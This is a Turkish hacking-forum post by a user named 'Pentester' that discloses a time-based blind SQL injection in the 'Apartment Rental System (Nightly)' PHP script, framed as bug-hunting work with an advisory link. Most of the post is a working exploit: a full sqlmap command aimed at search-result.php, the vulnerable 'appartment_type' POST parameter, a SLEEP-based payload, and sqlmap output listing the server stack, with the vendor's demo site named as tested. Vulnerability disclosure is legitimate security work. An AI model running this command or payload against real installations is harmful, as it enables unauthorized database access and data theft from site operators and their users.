Apartment Rental System - Time-Based Blind SQL İnjection / Pentester

Pentester

Özel Üye
8 Eyl 2016
1,646
995
Bug Search kapsamındaki çalışmamdır. "Apartment Rental System (nightly) " scripti üzerinde "Time-Based Blind SQL İnjection" zafiyeti tarafımca tespit edilmiştir. Videou olarak anlatımınıda yaptım.


Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : Apartment Rental System (Nightly) 
# Vulnerable Type : Time-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/apartment-rental-nightly/
# Author: Siber Gvenlik Akademisi - Pentester
# Date: 08.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'appartment_type' (POST)
# SQLİ: http://localhost/apartment-rental-nightly/search-result.php
# Proof of concept:
sqlmap -u "http://localhost/apartment-rental-nightly/search-result.php" --data="appartment_type=2&check_in=05%2F12%2F2017&check_out=06%2F27%2F2017&maxbed=2&maxbath=2&sorting=asc&submit=SEARCH" --random-agent --threads=5 --dbs

Parameter: appartment_type (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: appartment_type=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FmWg)&check_
in=06/04/2017&check_out=06/24/2017&maxbed=2&maxbath=1&sorting=desc&submit=SEARCH

---
[15:58:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.12

< ------------------- header data end of ------------------- >
Bug Link:
https://cxsecurity.com/issue/WLB-2017050053

VİDEO:
[ame]https://www.youtube.com/watch?v=RAkXYBHgBZY[/ame]
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.